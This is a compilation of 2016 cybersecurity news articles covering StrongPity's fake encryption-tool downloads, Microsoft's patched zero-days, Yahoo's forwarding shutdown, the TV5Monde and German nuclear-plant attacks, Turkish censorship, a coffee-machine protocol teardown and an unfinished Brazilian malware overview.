It’s time to consider seriously the security of IoT devices.
Searching for Best Encryption Tools? Hackers are Spreading Malware Through Fake Software
12.10.2016 thehackernews Virus
Searching for Best Encryption Tools? Hackers are Spreading Malware Through Fake Softwares
Over the past few years, Internet users globally have grown increasingly aware of online privacy and security issues due to mass monitoring and surveillance by government agencies, making them adopt encryption software and services.
But it turns out that hackers are taking advantage of this opportunity by creating and distributing fake versions of encryption tools in order to infect as many victims as possible.
Kaspersky Lab has revealed an advanced persistent threat (APT) group, nicknamed StrongPity, which has put a lot of efforts in targeting users of software designed for encrypting data and communications.
The StrongPity APT group has been using watering-hole attacks, infected installers, and malware for many years to target users of encryption software by compromising legitimate sites or setting up their own malicious copycat sites.
Watering hole attacks are designed to lure specific groups of users to their interest-based sites that typically house malicious files or redirect them to attacker-controlled downloads.
The StrongPity APT group has managed to infect users in Europe, Northern Africa, and the Middle East and targeted two free encryption utilities in different attacks: WinRAR and TrueCrypt.
WinRAR and TrueCrypt are long popular within security and privacy conscious users. WinRAR is best known for its archiving capabilities that encrypting files with AES-256 crypto, while TrueCrypt is a full-disk encryption utility that locks all files on a hard drive.
By setting up fake distribution sites that closely mimic legitimate download sites, StrongPity is able to trick users into downloading malicious versions of these encryption apps in hopes that users encrypt their data using a trojanized version of WinRAR or TrueCrypt apps, allowing attackers to spy on encrypted data before encryption occurred.
"The problem with people depending on tools like this isn’t the strength of the crypto, but more about how it's distributed," says Kurt Baumgartner, principal security researcher at Kaspersky Lab. "This is that problem that StrongPity is taking advantage of."
Booby-Trapped WinRAR and TrueCrypt Downloads
The APT group previously set up TrueCrypt-themed watering holes in late 2015, but their malicious activity surged in end of summer 2016.
Between July and September, dozens of visitors have redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on computer systems in Turkey, with some victims in the Netherlands.
However, in WinRAR case, instead of redirecting victims to a website controlled by StrongPity, the group hijacked the legitimate winrar.it website to host a malicious version of the file themselves.
The winrar.it website infected users mostly in Italy, with some victims in countries like Belgium, Algeria, Tunisia, France, Morocco and Cote D'Ivoire, while the attackers controlled site, winrar.be, infected users in Belgium, Algeria, Morocco, the Netherlands, and Canada.
Top Countries infected with StrongPity APT malware
According to Kaspersky, more than 1,000 systems infected with StrongPity malware this year. The top five countries affected by the group are Italy, Turkey, Belgium, Algeria and France.
The StrongPity APT's dropper malware was signed with "unusual digital certificates," but the group didn't re-use its fake digital certificates. It downloaded components include a backdoor, keyloggers, data stealers and other crypto-related software programs, including the putty SSH client, the filezilla FTP client, the Winscp secure file transfer program and remote desktop clients.
The dropper malware not only provides the hackers control of the system, but also allows them to steal disk contents and download other malware that would steal communication and contact information.
Therefore, users visiting sites and downloading encryption-enabled software are advised to verify both the validity of the distribution website as well as the integrity of the downloaded file itself.
Download sites that not use PGP or any strong digital code signing certificate are required to re-examine the necessity of doing so for the benefits of them as well as their own customers, explained Baumgartner.
Microsoft Patches 5 Zero-Day Vulnerabilities Being Exploited in the Wild
12.10.2016 thehackernews Vulnerebility
Microsoft Patches 5 Zero-Day Vulnerabilities Being Exploited in the Wild
Microsoft has released its monthly Patch Tuesday update including a total of 10 security bulletin, and you are required to apply the whole package of patches altogether, whether you like it or not.
That's because the company is kicking off a controversial new all-or-nothing patch model this month by packaging all security updates into a single payload, removing your ability to pick and choose which individual patches to install.
October's patch bundle includes fixes for at least 5 separate dangerous zero-day vulnerabilities in Internet Explorer, Edge, Windows and Office products that attackers were already exploiting in the wild before the patch release.
The patches for these zero-day flaws are included in MS16-118, MS16-119, MS16-120, MS16-121 and MS16-126. All the zero-days are being exploited in the wild, allowing attackers to execute a remote command on victim's system.
Although none of the zero-day flaws were publicly disclosed prior to Tuesday, the company was aware of attacks exploiting these flaws, said Microsoft.
Here's the list of Zero-Day Vulnerabilities:
CVE-2016-3298: An Internet Explorer zero-day flaw is a browser information disclosure vulnerability patched in MS16-118 bulletin among 11 other vulnerabilities. It could allow attackers to "test for the presence of files on disk."
CVE-2016-7189: A zero-day in the browser's scripting engine has been patched in Microsoft Edge bulletin, MS16-119, among others. The flaw is a remote code execution vulnerability.
CVE-2016-3393: Another zero-day in Microsoft Windows Graphics Component has been addressed in MS16-120 that could be exploited over the web, or via an email containing malicious file or over a file-sharing app to conduct RCE attack.
CVE-2016-7193: A single zero-day in Office has been addressed in MS16-121 bulletin. The flaw is a remote code execution vulnerability caused by the way Office handles RTF files.
CVE-2016-3298: The last publicly attacked zero-day has been patched in MS16-126, which is the only zero-day that is not rated critical, just moderate. The flaw is an information disclosure bug affecting Vista, Windows 7 and 8 and exists in the Microsoft Internet Messaging API.
Another bulletin rated critical is MS16-122 that patches a remote code execution flaw, CVE-2016-0142, in the Windows Video Control, affecting Windows Vista, 7, 8 and 10. The bug can be exploited when a user opens a crafted file or app from the web page or email.
Microsoft also patched twelve vulnerabilities in Adobe Flash Player for Windows 8.1, Windows 10, and Server 2012 in MS16-127.
Rest bulletins rated important or moderate, including MS16-123, MS16-124 and MS16-125, patches five elevation of privilege vulnerabilities in Windows Kernel-Mode, four elevation of privilege vulnerabilities in Windows Registry, and an elevation of privilege flaw in Windows Diagnostics Hub respectively.
Adobe Patch Update
Adobe also released a new version of Flash Player today that patched a dozen of vulnerabilities in its software, most of which were remote code execution flaws.
Adobe has also published code clean-ups for 71(!) CVE-listed security flaws in Acrobat and Reader, along with a fix for a single elevation of privilege bug in Creative Cloud.
Users are advised to apply Windows and Adobe patches to keep away hackers and cybercriminals from taking control over your computer.
A system reboot is necessary for installing updates, so admins are advised to save work on PCs where the whole package of patches is deployed before initiating the process.
Yahoo Disables Email Auto-Forwarding; Making It Harder for Users to Move On
11.10.2016 thehackernews Cyber
Yahoo! has disabled automatic email forwarding -- a feature that lets its users forward a copy of incoming emails from one account to another.
The company has faced lots of bad news regarding its email service in past few weeks. Last month, the company admitted a massive 2014 data breach that exposed account details of over 500 Million Yahoo users.
If this wasn't enough for users to quit the service, another shocking revelation came last week that the company scanned the emails of hundreds of millions of its users at the request of a U.S. intelligence service last year.
That's enough for making a loyal Yahoo Mail user to switch for other rival alternatives, like Google Gmail, or Microsoft's Outlook.
Yahoo Mail Disables Auto-Forwarding; Making It Hard to Leave
But as Yahoo Mail users are trying to leave the email service, the company is making it more difficult for them to transition to another email service.
That's because since the beginning of October, the company has disabled Yahoo Mail's automatic email forwarding feature that would allow users to automatically redirect incoming emails from their Yahoo account to another account, reported by the Associated Press.
All of a sudden it's under development? Here's what a post on the company's help page reads about the feature's status:
"This feature is under development. While we work to improve it, we've temporarily disabled the ability to turn on Mail Forwarding for new forwarding addresses. If you've already enabled Mail Forwarding in the past, your email will continue to forward to the address you previously configured."
In other words, only users who already had the feature turned ON in the past are out of this trouble, but users who are trying to turn ON automatic email forwarding now have no option.
Yahoo has shared the following statement about the recent move:
"We're working to get auto-forward back up and running as soon as possible because we know how useful it can be to our users. The feature was temporary disabled as part of previously planned maintenance to improve its functionality between a user’s various accounts. Users can expect an update to the auto-forward functionality soon. In the meantime, we continue to support multiple account management."
Yahoo is trying to save its Verizon Acquisition Deal
The move to turn off the email forwarding option could be an attempt to keep its customers’ accounts active because any damage to the company at this time is crucial when Yahoo seeks to sell itself to Verizon.
The Yahoo acquisition deal has not yet closed, and Verizon Communications has reportedly asked for a $1 Billion discount off of Yahoo's $4.83 Billion sales price.
As a workaround, you could switch on your vacation responder instead to automatically reply to emails with a note about your new email address.
Delete Your Yahoo Account Before It's Too Late
You can also forego the forwarding process and simply delete your Yahoo Mail account entirely, until and unless Yahoo disables that option, too.
As the Reg media reports that British Telecoms customers, whose email had been outsourced to Yahoo, have not been able to set up automatic email forwarding or even access the option to delete their accounts.
"Sorry, the delete feature is currently unavailable. This feature will become available by the end of September," the error message reads.
So, hurry up before it gets too late.
Challenge! WIN $50,000 for Finding Non-traditional Ways to Detect Vulnerable IoT Devices
11.10.2016 thehackernews Safety
Challenge — WIN $50,000 for Discovering Non-traditional Ways to Find Vulnerable IoT Devices
If you are concerned about the insecurity of Internet of Things, have good hands at programming and know how to hack smart devices, then you can grab an opportunity to earn $50,000 in prize money for discovering the non-traditional ways to secure IoT devices.
Internet of Things (IoT) market is going to expand rapidly over the next decade. We already have 6.5 billion to 8 billion IoT devices connected to the Internet worldwide, and the number is expected to reach 50 billion by 2020.
While IoT is going to improve life for many, the number of security risks due to lack of stringent security measures and encryption mechanisms in the devices have increased exponentially.
This rise in the number of security risks would continue to widen the attack surface, giving hackers a large number of entry points to affect you some or the other way.
Recently, we saw a record-breaking DDoS attack (Distributed Denial of Service) against the France-based hosting provider OVH that reached over one Terabit per second (1 Tbps). The attack was carried out via a botnet of infected IoT devices, dubbed Mirai Malware.
So, the threat to and with IoT is Big, and we have to look for a solution right now because tomorrow it will be very late.
We already have some ways to find vulnerable IoT devices, like Shodan and Censys search engine. While Shodan has been designed specifically to locate any devices that have been carelessly plugged into the Internet, Censys employs a more advanced approach to finding vulnerabilities in the devices by daily scanning the whole Internet.
However, other creative ways to discover vulnerable IoT devices include a Flying Drone with a tracking tool capable of sniffing out data from Internet-connected devices.
Challenge — Find Ways to Detect Vulnerable IoT Devices
Now, in an attempt to find a solution that can help network admins monitor IoT devices, non-profit research and development organization MITRE has challenged researchers to come up with new ideas for detecting rogue IoT devices on a network.
The good news: You can earn $50,000 for your idea.
Researchers who will find and report a non-traditional, game-changing approach for identifying IoT devices while passively observing the network, without the requirement of modification to the existing protocols and manufacturing, can earn up to $50,000.
"We are looking for a unique identifier or fingerprint to enable administrators to enumerate the IoT devices while passively observing the network," reads MITRE website.
Along with the prize money, MITRE has also promised:
Recognition and Promotion.
The opportunity to connect with government agencies looking for IoT solutions.
The chance to work with MITRE experts to better understand the government's needs.
The MITRE IoT team has created a model home network that will serve as a testbed for the Challenge. This powerful home network includes a broad range of affordable devices with diverse operating characteristics.
"We believe that the identification techniques that prove effective in a home system will translate to industrial, healthcare, military, smart city, and other IoT networks," the team writes.
This Challenge is open to individual entrepreneurs, college teams looking for showcasing their talents and small companies who want to make their mark in the IoT market.
The registration period has already started so that you can register here. The challenge will begin in early November for approximately six weeks, so all participants will have to demonstrate a unique, simple and affordable solution to identify rogue IoT devices within this short period.
The winner will be announced before the end of December. So, if you think you have the potential to find out a solution to this issue, then what are you waiting for? Register yourself today.
The France TV5Monde was almost destroyed by the Russian APT28 group
11.10.2016 securityaffairs APT
The TV5Monde director-general has told the BBC that his TV was almost destroyed by a targeted cyber attack conducted by the Russian APT28 group.
On April 2015, the TV5Monde was hit by a severe cyber attack that compromised broadcasting of transmissions across its medium. The attackers also hijacked the Channel TV5Monde website and social media accounts of the French broadcaster.
TV5Monde is controlled by the French Government, hackers of the Cyber Caliphate took the responsibility for shutting down broadcasting across its 12 channels for several hours causing the interruption of the transmission.
Now new revelations on the facts are disclosed by Yves Bigot, the director-general of TV5Monde. Mr. Bigot told the BBC that the cyber-attack came close to destroying the network of the French TV, however, further investigation suggests the involvement of different threat actors, on the facts are disclosed by Yves Bigot, the director-general of TV5Monde. Mr. Bigot told the BBC that the cyber-attack came close to destroying the network of the French TV, however, further investigation suggests the involvement of different threat actors, Russian hackers.
“It’s the worst thing that can happen to you in television,” Mr Bigot told BBC
“We were a couple of hours from having the whole station gone for good.”
“We were saved from total destruction by the fact we had launched the channel that day and the technicians were there,”
“One of them was able to locate the very machine where the attack was taking place and he was able to cut out this machine from the internet and it stopped the attack.”
“We owe a lot to the engineer who unplugged that particular machine. He is a hero here,”
The hackers compromised the network of the French TV at least 10 weeks before (on 23 January 2015) launching the final attack with a custom malware software that was designed to target encoder systems used to transmit programmes.
The hackers carried out reconnaissance of TV5Monde network to figure out the way it broadcast its transmissions, then they used the malware to destroy the internet-connected hardware that controlled the TV station’s operations.
“The attack was far more sophisticated and targeted than reported at the time. The perpetrators had first penetrated the network on 23 January.” reported the BBC.
The investigators have discovered multiple entry points used by the attackers, such as supplier networks and remote controlled cameras used in studios.
The involvement of a Russian threat actor, the APT 28 group, was also suggested by the security firm FireEye.
According to security experts at FireEye, the Russian ATP28 (also known as Pawn Storm, Tsar Team, Fancy Bear and Sednit) may have used the name of ISIS as a diversionary strategy, the experts noticed a number of similarities in the TTPs used by the Russian group and the one who breached the network at TV5Monde.
“There are a number of data points here in common,” said Jen Weedon, manager of threat intelligence at FireEye. “The ‘Cyber Caliphate website,’ where they posted the data on the TV5Monde hack was hosted on an IP block which is the same IP block as other known APT28 infrastructure, and used the same server and registrar that APT28 used in the past.”
Weedon confirmed that at the time of the TV5Monde attack, other journalists were targeted by the APT28 group and the attacks were coordinated by the same hacking infrastructure used by the team.
Experts at FireEye published a detailed report on ATP28 in October 2014, speculating that the group is composed by state-sponsored hackers that are managing a long-running cyber espionage campaign on US defense contractors, European security organizations and Eastern European government entities.
Mr. Bigot confirmed that the French cyber-agency told him that hackers had used the ISIS brand to cover their tracks.
The TV5Monde director was later told evidence had been found that the attack was conducted by the Russian APT 28 group.
Mr. Bigot explained that he has absolutely no idea the chosen of TV5Monde as the target.
“There are two things that the investigation won’t probably be able to achieve,” he added. “The first one is why us – why TV5Monde?” “And the second one is: Who gave the order and the money to that Russian group of hackers to actually do it?”
According to the BBC, that cited intelligence analysts in the UK and US, and France, the cyber attack against the French TV was a highly-targeted attack conducted by Russian hackers most likely in the attempt hackers most likely in the attempt “to test forms of cyber-weaponry as part of an increasingly aggressive posture”.
Regardless of whoever is the culprit, there is one certainty, the cyber attack cost the TV station €5m ($5.6m) and left it with an increased reoccurring bill of €3m ($3.4m) due to the necessity to implement and adopt further security countermeasures.
Shocking, a German nuclear plant suffered a disruptive cyber attack
11.10.2016 securityaffairs Cyber
A German nuclear plant suffered a disruptive cyber attack, the news was publicly confirmed by the IAEA Director Yukiya Amano.
According to the head of the United Nations nuclear watchdog, the International Atomic Energy Agency (IAEA) Director Yukiya Amano, a nuclear power plant in Germany was hit by a “disruptive” cyber attack two to three years ago.
“This issue of cyber attacks on nuclear-related facilities or activities should be taken very seriously. We never know if we know everything or if it’s the tip of the iceberg.” Amano told Reuters Agency.
“This issue of cyber attacks on nuclear-related facilities or activities should be taken very seriously. We never know if we know everything or if it’s the tip of the iceberg.”
“This is not an imaginary risk,” added Amano who also participated in a meeting with Foreign Minister Frank-Walter Steinmeier.
Amano confirmed that cyber attacks on nuclear plants are a serious threat, he did not provide further details of either incident.
Fortunately, the damages caused by the cyber attack on the German nuclear plant did not force the operators to shut down its processes but urged the adoption of additional precautionary measures.
“This actually happened and it caused some problems,” he said. “[the Germant plant] needed to take some precautionary measures.”
Amano added that is is the first time that the attack is discussed in public, he also reported a case in which an individual tried to smuggle a small amount of highly enriched uranium with the intent to build a so-called “dirty bomb.”
Be careful the attack was disruptive, not destructive, and believe me there is a substantial difference. The term disruptive refer a category cyber attacks that are able to destroy internal computer systems without causing the complete destruction of the plant. Examples of disruptive attacks are the attacks against Sony Pictures Entertainment and Stuxnet.
This isn’t the first time that we receive the news of cyber attacks on nuclear plants There are three publically known attacks against nuclear plants:
Monju NPP (Japan 2014)
Korea Hydro and Nuclear Power plant (S.Korea 2014)
Gundremmingen NPP (Germany 2016).
It is likely that Amano was referring the cyber attack against the Gundremmingen nuclear plant that occurred earlier this year. Security experts in that case, detected Conficker and Ramnit malware.
Security experts are aware of the possibility that hackers could cause serious problems to nuclear plants worldwide.
According to a report released in March, Germany is not adequately equipped to prevent terrorist attacks in its nuclear plants.
The report was presented by Oda Becker, an independent expert on nuclear plants.
This is of course extremely distressing, especially in the light of the recent tragic events in Belgium with substantial casualties.
The report was brought to public attention at the German Federation for the Environment and Nature Conservation (BUND) Congress, where concerns were expressed towards protecting citizens from catastrophic consequences of another terrorist attack.
germany nuclear plant vulnerable terrorism
Amano explained that the UN agency was supporting countries to improve the resilience of their infrastructure to cyber attacks with a series of measures.
“Amano said the U.N. agency was helping countries increase cyber and overall nuclear security through training and a detailed database that included information from 131 countries, and by providing them with radiation detection devices.” reported the Reuters.
“Since 2010, the IAEA said it had trained over 10,000 people in nuclear security, including police and border guards, and has given countries more than 3,000 mobile phone-sized instruments for detecting nuclear and other radioactive material.”
MITRE will award $50,000 for a solution that detects rogue IoT Devices
11.10.2016 securityaffairs Safety
MITRE has challenged the security community to devise new methods that could help in detecting rogue IoT devices on a network.
The non-profit research and development organization MITRE has challenged security researchers to propose new methods and technologies that could help in detecting rogue Internet of Things (IoT) devices on a network.
The goal of the Unique Identification of IoT Devices Challenge is to prevent abuses of IoT devices devising a solution that can help administrators monitor IoT devices.
Flawed IoT devices and poorly configured smart objects are a privileged target for hackers that compromise them to compose powerful botnet.
Recently IoT botnets were observed launching massive DDoS attacks against the OVH websites and the KrebsonSecurity.com.
Mitre will give a $50,000 reward to the researchers who will propose a non-traditional method for enumerating IoT devices through passive network monitoring.
“The MITRE Challenge, Unique Identification of IoT Devices, seeks to discover possible solutions to this potential threat so our sponsors can reap the benefits of this technological evolution, while minimizing the risks.” states the MITRE.
“We are looking for non-traditional approaches for identifying IoT devices. In the future, manufacturers may embed unique digital signatures into each device. For today, we need to be able to monitor the products already in use.
We’re looking for a game-changing approach to identifying devices that would require no modification to the existing inventory, e.g., no change in protocols or manufacturing.”
MITRE Unique Identification of IoT Devices Challenge offers participants from around the world the recognition and promotion for coming up with a game-changing solution, and the opportunity to connect with government agencies looking for IoT solutions.
The challenge, that will begin in November, is open to research teams, companies and also to individuals.
Participants will have six weeks to propose their solutions for detecting bogus IoT devices.
MITRE has created a testbed network composed of a wide range of devices having different characteristics.
“The MITRE IoT team has built a model home network to serve as a testbed for the Challenge. This robust home system includes a broad array of affordable devices with diverse operating characteristics. We believe that the identification techniques that prove effective in a home system will translate to industrial, healthcare, military, smart city, and other IoT networks.” reads the MITRE.
According to EurActiv, the European Commission is working on a legislation aimed at securing IoT devices. The legislation will force vendors and manufacturers to adopt a security by design approach for their smart objects.
Využívání cloudů je díky bezpečnostní architektuře společnosti Fortinet naprosto bezpečné
11.10.2016 SecurityWorld Zabezpečení
Internet věcí, cloud computing, virtualizace či využívání soukromých zařízení ve firemních sítích přináší netušené možnosti rozvoje byznysu, avšak také nové hrozby a bezpečnostní rizika. Mnoho společností stále spoléhá na zastaralé bezpečnostní strategie. Aktuální problémy kybernetické bezpečnosti řeší společnost Fortinet bezpečnostní architekturou Security Fabric.
Bezpečnostní architektura Security Fabric poskytuje škálovatelnou, širokospektrou ochranu proti bezpečnostním hrozbám pomocí úzce provázané, účinné bezpečnostní infrastruktury.
„Všudypřítomná digitalizace mění zavedené obchodní modely, zatímco technologické trendy jako internet věcí a cloud computing stírají hranice dnešních sítí. Mnoho podniků naneštěstí stále spoléhá na desítky let staré bezpečnostní strategie, které neodpovídají dynamice dnešního byznysu. Na rozdíl od platforem volně propojených na úrovni řízení provazuje architektura Security Fabric jako předivo vysoce pokročilý hardware a software a umožňuje přímou komunikaci mezi jednotlivými řešeními a tedy i jednotnou a rychlou reakci na hrozby,“ vysvětluje Ken Xie, šéf společnosti Fortinet.
Integrovaná, spolupracující a adaptabilní architektura Security Fabric poskytuje korporacím distribuované zabezpečení a zajišťuje ochranu proti hrozbám ze strany internetu věcí a vzdáleně připojených zařízení, jak v jádru informační infrastruktury tak i v cloudu.
Pět základních principů Security Fabric
Bezpečnostní architektura Security Fabric propojuje dříve nezávislé systémy do jediného provázaného celku založeného na pěti základních vzájemně závislých principech – přizpůsobitelnosti, informovanosti, bezpečnosti, praktické využitelnosti a otevřenosti.
Aby bezpečnostní architektura dokázala detekovat a neutralizovat hrozby ve všech částech dnešních neohraničených sítí, musí být dynamicky přizpůsobitelná (škálovatelná) nejen z hlediska proměnlivých požadavků na objem a výkon, ale také z hlediska rozsahu a povahy sítě. Portfolio bezpečnostních technologií společnosti Fortinet zahrnuje řešení, která pokrývají každou část infrastruktury, včetně pevných a bezdrátových sítí, uživatelských koncových zařízení a zařízení internetu věcí, přístupových vrstev, veřejných, soukromých i hybridních cloudových modelů, softwarově definovaných sítí a virtualizace. Technologie zajišťují, aby funkčnost, výkon a škálovatelnost sítě nebyla bezpečnostními prvky narušena.
Rozšiřitelnost řešení společnosti Fortinet na celou infrastrukturu je základem pro další zásadní princip architektury Security Fabric – informovanost. Architektura funguje jako celek a poskytuje přehled o zařízeních, uživatelích, obsahu a datech proudících do sítě i ven z ní a o vzorcích v datovém provozu. To na jedné straně snižuje komplexitu a náklady, na druhé zvyšuje efektivitu řízení a usnadňuje zavádění nových schopností a inovativních bezpečnostních strategií.
Dokonalý přehled o infrastruktuře je zásadní pro dosažení požadované úrovně zabezpečení proti všem typům ohrožení. Jako společné rozhraní pro všechny součásti bezpečnostní architektury Fortinet Security Fabric slouží FortiOS, nejčastěji nasazovaný bezpečnostní operační systém na světě. Technologie jako Fortinet Advanced Threat Protection Framework provádí hloubkovou analýzu provozu, dynamicky generují lokální informace o hrozbách a předávají data laboratořím FortiGuard Labs, které automaticky v reálném čase distribuují aktualizace do celého systému. Šíře těchto informací spolu s propracovanou, škálovatelnou a rychlou analýzou poskytuje bezpečnostní architektuře prakticky využitelné vstupy umožňující rychlou reakci a neutralizaci hrozeb bez ohledu na místo jejich výskytu.
Aby zákazníci mohli využít stávajících investic do infrastruktury a zabezpečení, je architektura Security Fabric koncipovaná tak, aby ji bylo možno integrovat s širokou škálou řešení jiných dodavatelů. Společnost Fortinet úzce spolupracuje s partnery sdruženými v globální alianci na vývoji otevřených API pro všechny části bezpečnostní architektury. Zákazníkům to poskytuje flexibilitu při zavádění řešení společnosti Fortinet vedle stávajících nebo nových bezpečnostních technologií a integrovat je spolu pro dosažení vyšší úrovně ochrany.
Více informací naleznete na: http://demand.fortinet.com/cz-securityfabric
FortiOS | Architektura pro bezpečný přístup |
Přístupové aplikace | Pokročilé síťové aplikace na podporu konektivity Integrovaná, komplexní řešení přístupových aplikací, které umožňují přístup pro hosty, poskytují přehled o připojených zařízeních a uživatelích, zajišťují proces připojování nových zařízení atd. |
Ověřování/ koncové body | Proces připojování a zabezpečení všech uživatelů a zařízení Aplikace pro ověřování dodávané společnosti Fortinet automatizují připojování nových zařízení hostů a zaměstnanců, nabízí jednotné přihlašování, správu certifikátů a další funkce. |
Správa | Flexibilita lokální a cloudové implementace Možnost volby implementace přístupové vrstvy s kontrolérem nebo bez, cloudové, vícekanálové nebo jednokanálové. |
Zabezpečení | Zabezpečení přístupu příští generace Ucelené portfolio síťových bezpečnostní zařízení nabízí na přístupové vrstvě ochranu proti kybernetickým hrozbám na podnikové úrovni. |
Kontroléry | Centrální řízení všech bezdrátových přístupových bodů a přepínačů LAN Infrastrukturní (samostatné) a integrované kontroléry nabízí flexibilní možnosti implementace. Naše nové výkonné infrastrukturní kontroléry FortiWLC 50D, 200D a 500D, podporují 50, 200, respektive 500 přístupových bodů, splňují požadavky standardu 802.11ac Wave 2 a umožňují připojení většího počtu zařízení. |
Přepínače | Přepínače podnikové třídy pro bezpečný přístup a datová centra Široká nabídka vysoce výkonných, cenově efektivních přístupových přepínačů a přepínačů pro datová centra, včetně FortiSwitch FS-224D-FPOE nebo FS-548D-FPO, které nabízí 24, respektive 48 napájených portů (PoE) a řada 10Gb/s ethernetových přepínačů pro datová centra s univerzální správou pomocí zařízení FortiGate. |
Přístupové body | Přístupové body WLAN pro každý podnik a případ využití Možnost výběru z kompletní řady podnikových přístupových bodů podporujících standard 802.11ac Wave 2 a všechny varianty implementace včetně zapojení s kontrolérem, bez kontroléru nebo s cloudovou správou, pro venkovní i vnitřní použití. |
Turkey Blocks GitHub, Google Drive and Dropbox to Censor RedHack Leaks
10.10.2016 thehackernews Security
Turkey Blocks GitHub, Google Drive, Dropbox & Microsoft OneDrive To Censor RedHack Leaks
Turkey is again in the news for banning online services, and this time, it's a bunch of sites and services offered by big technology giants.
Turkey government has reportedly blocked access to cloud storage services including Microsoft OneDrive, Dropbox, and Google Drive, as well as the code hosting service GitHub, reports censorship monitoring group Turkey Blocks.
The services were blocked on Saturday following the leak of some private emails allegedly belonging to Minister of Energy and Natural Resources Berat Albayrak — also the son-in-law of President Recep Tayyip Erdogan.
Github, Dropbox, and Google Drive are issuing SSL errors, which indicates interception of traffic at the national or ISP level. Microsoft OneDrive was also subsequently blocked off throughout Turkey.
The leaks come from a 20-year-old hacktivist group known as RedHack, which leaked 17GB of files containing some 57,623 stolen emails dating from April 2000 to September this year. A court in Turkish confirmed the authenticity of the leak.
The move to block aforementioned services is seemingly to suppress circulation of these stolen emails and to stop Internet users from hosting the email dumps on their accounts, which may allegedly reveal a widespread campaign of propaganda and deception.
According to Turkey Blocks, Google Drive had already been unblocked on Sunday, while other services are still unavailable in the country.
Like China, Turkey has long been known for blocking access to major online services in order to control what its citizens can see about its government on the Internet. In March, the country banned its people from accessing Facebook and Twitter, following a car bomb explosion in Turkey capital Ankara.
The same happened in March 2014, when Twitter was banned in Turkey after an audio clip was leaked on YouTube and Twitter about the massive corruption of Turkey Prime Minister Recep Tayyip Erdoğan instructing his son to dispose of large amounts of cash in the midst of a police investigation.
Also, it is not the first time when some group of hackers has exposed personal emails of the member of Turkey government. A few months ago, personal details of almost 50 Million Turkish citizens, including the country's President Recep Tayyip Erdogan, was posted online.
Apple Watches banned from UK cabinet meetings to prevent eavesdropping
10.10.2016 securityaffairs Apple
The UK Government has decided to ban Apple Watches ban from the Cabinet over foreign eavesdropper fears, in 2013 occurred with the iPad.
The political fears cyber espionage, the recent string of cyber attacks against the US Presidential election and the constant pressure of Chinese hackers urge a major awareness on the cyber threats. In 2013, cabinet ministers were banned from bringing smartphones and tablets to meetings, the UK Government decided to ban iPads from the Cabinet over foreign eavesdropper fears.
The news was reported by the Mail on Sunday, after the Cabinet Office minister Francis Maude made a presentation using his iPads the Downing Street security staff has dismissed the mobile device to prevent eavesdropping of ongoing discussions.
Now the Tory government’s cabinet ministers have banned the Apple watches from internal meeting in case they are compromised by foreign cyber spies. The UK Government believes that Russians hackers could exploit such category of devices to gather sensitive information.
“Ministers have been barred from wearing Apple Watches during Cabinet meetings amid concerns that they could be hacked by Russian spies, The Telegraph has learned.” reported the Telegraph.
“Mobile phones have already been barred from the Cabinet because of similar concerns.One source said: “The Russians are trying to hack everything.”
apple-watches-banned-british-cabinet
It seems that Apple Watches are very popular gadgets among cabinet ministers when David Cameron was the prime minister many politicians. Things have changed under the government of the Prime Minister Theresa May who banned the devices amid fears that foreign hackers could listen in to government business.
The measure was adopted to avoid foreign security services infecting wearable devices mobile that could be used to spy on the ministers.
Reverse engineering a Smarter Coffee machine for fun and a security lesson
10.10.2016 securityaffairs Safety
Simone Margaritelli has done a reverse engineering of the Smarter Coffee IoT Machine Protocol to control the machine from his terminal. What is the lesson?
While security industry is stressing the need to adopt a security by design approach for IoT devices, security researchers continue to find flawed and poorly designed smart objects.
Clearly, such kind of devices is a privileged target for crooks that could abuse them to conduct a wide range of illegal activities.
Ok … but it’s time for a coffee break now and surfing the web I found a curious and interesting article of a popular Italian hacker, Simone Margaritelli, aka evilsocket. Simone is a former blackhat hacker now mobile security researcher and senior ASM/C/C++ developer for Zimperium firm, he is the creators of the popular tool bettercap.
Like me, Simone loves coffee so a few days ago he bought a Smarter Coffee machine that can be controlled via a mobile application that allows users to prepare a good coffee with many options.
Simone Margaritelli decided to do a reverse engineering of the Smarter Coffee IoT Machine Protocol with the intent of control the coffee machine even from his terminal.
The expert focused its analysis on classes and methods present in the source code of the app, then he found something of interest in the am.smarter.smarterandroid.models.a class.
The researcher discovered the way the app and the machine communicate and which is the protocol they use.
“Each of these “packets” is sent to tcp port 2081 of the machine, the protocol is very simple.
First byte: the command number.
Second byte to N: optional data ( depending on the command code ).
Last byte: always 0x7e which indicates the end of the packet.
Responses can vary, but for most of the commands they are:
First byte: response size
Second byte: status ( 0 = success otherwise error code )
Last byte: always 0x7e.
An example command and response, the one to keep the coffee warm for 5 minutes for instance, would be:
COMMAND : 0x3e 0x05 0x7e
RESPONSE : 0x03 0x00 0x7e”
At this point, it was a joke for Simone to write a simple console to send commands to the Smarter Coffee machine as you can see in the video PoC published by the hacker.
Simone has published the code on GitHub, below a few sample of the commands available to control the coffee machine.
Make one cup of coffee: coffee make.
Make two cups using the filter instead of the beans in the grinder coffee make –filter.
Keep coffee warm for ten minutes coffee warm –keep-warm=10.
Simone Margaritelli highlighted that anyone on the same network of the machine could send commands to the device due to the absence of authentication.
“Even if the mobile app requires you to register an account, access to port 2081 is completely unauthenticated ( in fact, I’ve found that the user account is only used for statistics using the Firebase API ), anyone on your network could access it and even flash a new firmware with no authentication required ( I reversed the
UPDATE_FIRMWARE
packet as well but you won’t find it on the repo 😛 )” Simone wrote in a blog post.
The evolution of Brazilian Malware
2.4.2016 Zdroj: Kaspersky Virus
Brazilian malware continues to evolve day by day, making it increasingly sophisticated. If you want to know how the various malicious programs work nowadays, you can jump to the corresponding section here. Meanwhile, before that, we would like to show how the techniques used by Brazilian cybercriminals have changed, becoming more advanced and increasingly complex.
Taking a look at the wider picture we can see that the authors are improving their techniques in order to increase malware lifetime as well as their profits.
Some time ago, analyzing and detecting Brazilian malware was something that could be done pretty fast due to no obfuscation, no anti-debugging technique, no encryption, plain-text only communication, etc. The code itself used to be written in Delphi and Visual Basic 6, with a lot of big images inside making it a huge file, as well as poor exception handling where the process would regularly crash.
Nowadays, the scenario is not the same; the attackers are investing time and money to develop solutions where the malicious payload is completely hidden under a lot of obfuscation and code protection. They do still use Delphi and VB, but have also adopted other languages like .NET and the code quality is much better than before, making it clear to us that they have moved to a new level.
Let’s walk through some samples showing the difference between what we used to find a few years ago and the threats being delivered today.
What we used to find
Keylogger
In the beginning, the first samples used to steal banking information from customers were simple keyloggers, most of them using code publicly available with some minor customizations in order to log only specific situations. At the time it was sufficient since banking websites were not using any kind of protection against this threat.
Public keylogger source code
Code implemented on malicious binary
